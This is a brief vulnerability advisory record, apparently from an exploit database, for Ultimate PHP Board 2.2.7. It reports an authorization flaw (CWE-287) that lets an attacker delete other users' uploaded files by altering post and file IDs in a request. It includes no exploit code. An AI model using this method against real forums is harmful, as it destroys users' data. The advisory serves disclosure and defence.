vendor: Ultimate PHP Board
by: i2sec - Gi bum Hong
CVSS: 7.5 HIGH
Broken Authentication and Session Management
CWE: 287
Product Name: Ultimate PHP Board
Affected Version From: 2.2.2007
Affected Version To: 2.2.2007
Patch Exists: NO
Related CWE: N/A
CPE: a:textmb:ultimate_php_board:2.2.7
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache 2.2.14, MySQL 5.1.39, PHP 5.2.12
2011
Ultimate PHP Board 2.2.7 “Broken Authentication and Session Management”
This vulnerability allows an attacker to delete another user's uploaded file by changing the post ID and file ID/name in the request message to those of the targeted file.
Mitigation:
Ensure that authentication and session management mechanisms are properly implemented and enforced.